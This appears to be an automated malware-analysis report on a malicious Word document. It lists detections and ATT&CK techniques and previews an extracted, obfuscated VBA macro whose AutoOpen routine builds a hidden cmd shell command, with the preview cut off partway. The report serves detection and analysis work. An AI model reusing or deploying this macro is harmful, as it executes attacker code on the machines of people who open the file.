MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing a VBA macro. The AutoOpen macro is present and utilizes a Shell() call, indicating an attempt to execute arbitrary code. This is a common technique for downloading and executing further malicious payloads. The presence of the 'macros.bas' artifact and the ClamAV detection strongly suggest malicious intent.
Heuristics 6
-
ClamAV: Doc.Malware.00536d-6922915-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6922915-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 91440 bytes |
SHA-256: 3d4b6ac057165030dac9037c6969d32a329dd5549b4a4457c56548edfea9da23 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "EjVEofZqrXazrC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim cFiGoL(1)
cFiGoL(0) = Left(DKTOAirm + aiXffLawPflTOqPJAiRwocHqAWtmKA + OVwZTjpwOX, 687) + Left(YlZqwjD + iDYVabVsaSSotMaXLoUsFlblTvOR + bmsBzGNbW, 932)
Dim oHXOw(2)
oHXOw(0) = Left(HBAEXotnjiOFup + VaiXsXJKwtkHiLHkassOjwFFjSDP + bBnPZGkrq, 117) + Left(UjFXHVT + ncMBYmSZruiMKfXrLUjkBcdZzMLivwQnY + ATSRwLzrK, 16)
oHXOw(1) = Right(PJzsNlqcZuNSNj + OurDvdKANSDakTYWMvZCBizoGF + SAQcPJZ, 80) + MidB(wfuiProapwAkmn + pUwoEuMOkaUHEwIIazZTHzjQEDhO + XTEHwuDSfw, 792, 449) + Left(azsbLpjiWB + YiIKCMqnjvsAKtHdVdkSFLGCnkowCSJWZ + vcjtpiHrQj, 927) + Right(BYEWOoD + KDCrwphBJUzIZAZULzUrJiviOnIlG + SdqzfRJPXcizbX, 4)
Dim NWiij(1)
NWiij(0) = Left(cffbLzOmFKHd + XDaiPHFnEGzZKcGSwjhcQkWlVwcN + dpTEzUhcpbZd, 30) + Left(KwrBsuw + KwsVjrbsqbvICTkCTDmjwiKzl + ojAstBcMs, 973)
Dim wsNQY(1)
wsNQY(0) = Right(nERKSjwqB + BhYAGTYZatLUbftGfpuWdXU + OIXZZkPCrwlt, 833) + Left(otszjzNSz + WHKucllqLDUmkMSfiorbijfXwl + aiINIswTzHBnV, 704)
rrGNPsrsO (KeyString(vbKeyC) + KeyString(vbKeyM) + hlbNbsZw + XHbiKFkbHi + iEzTa + ZcjBwYQqaGiWY + nZtqjbnPTQISIq)
Dim tKzwd(1)
tKzwd(0) = MidB(KQiEsEQLaTw + OTHablIXotmkuzjCSEswFEtQSwHl + kwaDWVsDFWXr, 373, 976) + Mid(iXAuuAJbFWiV + jHuwJDEdfzotjTJLhUkkwsjnwzAnX + pQwVpBjBrDhF, 150, 489)
Dim GXwJWw(1)
GXwJWw(0) = MidB(NvYOZSV + iYTEJALmMPkoIzwOcFXoPtdlDZp + mjaSInwXnWJjYL, 141, 751) + Left(LqVwjKjDL + INXOpBZihbfbmjOFrziJiKZqzPi + QIfImUiKhEr, 477)
End Sub
Attribute VB_Name = "knJJEwWwFZPGjf"
Function hlbNbsZw()
Dim dqiOlG(1)
dqiOlG(0) = MidB(bvGtFVABSFr + iiHIjXSvwUYmfNRLujnwfME + rVEDshvLbFC, 667, 313) + MidB(wlVSpnkGJlZb + bviXnETuRjFkpFuXiztrmKsH + SSFzcAKXKdjTBU, 775, 258)
Dim izISAP(2)
izISAP(0) = Mid(TIzJRHzIHHf + HYEWJjEVDjnZwAlkVLVaQcrJNkpswJjqQQ + RpHQYMj, 416, 139) + MidB(XmUiWrWLuR + lNrqQPJLVHRtfzdjsVBRGciJztEj + zWChWTFzKBQUb, 976, 68) + MidB(fBwYAXwkOmGKR + iBizzvJZQEMBlAfFHiqSzwGwIhz + lrqZQGuzWbfTT, 220, 887) + Right(GADRqqoik + wBsRSnaKvaPzNCGKzdzuawjbuB + fHDzViOBfkkEm, 831)
izISAP(1) = Mid(PnjdjHLiBGRSi + IsjjsJChXwzCctHjztLYHYvZzORv + EbLDIIjMF, 222, 639) + Right(JCIzhVpB + UcKwjETGAifzAEbpMwAGPlXpPjaiRf + azLzHmEjIdMCa, 896) + Mid(cCYjcIvLMPE + AOROqiidPrBKMmZVduBOHCPRCA + hhHHPunkQbCNL, 190, 638) + Mid(IlrzjtfwzJLaMb + wjUDEWihiEBoDzVzWtOzncJQlcJDzZiM + OrmGKVfsn, 199, 909)
XzSGjrjkB = "d /V" + "^:^ON/C" + CStr(Chr(5 + 5 + 5 + 3 + 16)) + "s" + "e^t $^,^\^?=" + "-\_^ -/_^ -/" + "^_^ _/-^ /" + "-_^ /\^_ _-/ " + "/_" + "^\^ " + "_/^\ \^" + "-/^" + " \^-^_ ^\^_/"
Dim WMjiZZ(1)
WMjiZZ(0) = Left(JcuYzNbnoOCXzR + ETAXkIhVUAKVWNBEwjbYjAwoiKuqEGv + YILBvYD, 948) + MidB(ARABTwl + VuTWlTCLJGOrwHcfjDfbiuwWiJbs + mELFlZhsMdn, 917, 836)
Dim BOOvfu(1)
BOOvfu(0) = Right(DsNuzEzwOAkY + WMBPhzZDYFGMMhXZFtSzijOCVaNTME + CtQNlIzTIoksR, 904) + MidB(fiXnqOTfSuD + luIGpBdIIKHMpuzWjmohhTAnalu + WHWtblc, 869, 257)
DTzlZ = " _^-/^ " + "-\^_ /-^" + "\ -_/^ /-_^" + " ^-_/}" + "^_/^-}/^\_{\_" + "/h_^-^" + "\c/^_-^t-\_" + "^a^\/^-c/\^" + "-^}/-^_" + "^;^-\^_k^-^_^"
Dim OJrAX(1)
OJrAX(0) = Mid(uGFiZbMvF + jcaidtllcVshYJzWLudNDvnqEHj + qCzNikfzPmWSYO, 465, 114) + Mid(qkOiXFPXipD + wzYCiZwQmftHHuijpiqKiHftzKBp + IZSAMtjTLDEV, 485, 297) + Left(sBaSrzGpqu + wFkpzazibiUDVSmGNwdSzPbqIT + RuBUGTOV, 969) + Mid(sOhEOVhUi + ijVnkaYjOwTCbCAMrjAjkDSLMUbzu + MSzSioz, 280, 482)
Dim YXKFzF(2)
YXKFzF(0) = MidB(pcnzYCzRm + rvXJOzoCniCqBlkNfhOsPJmkTKd + FDdwBNwH, 172, 270) + Right(GZzvnSvjYGY + HAbNUjYZznYojFWTbNJjpojsi + wiAutNUuohPO, 628) + Mid(XziFzTkF + wQmYoopipwIYudPLhlLzcRhJcnRNZwEv + WAsZkrdBzEsc, 686, 150) + MidB(qqVIHHGfM + kiZpujhphtOlidRcQJLGHOZn + tNNtSsSZP, 963, 919)
YXKFzF(1) = Mid(VaFbjiiqi + nPZcSaVsanfYVKrMSEBqpfCnp + YPwAGDSpGpcDur, 646, 901) + MidB(QrTwRwH + jzQmfjLCYjOQTVlXHwIkVhY + azCtUiisqCz, 386, 667)
GmdBCqHwj = "\^a-" + "\_^e/\" + "^_r\/_b-/^_^;" + "_" + "/
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.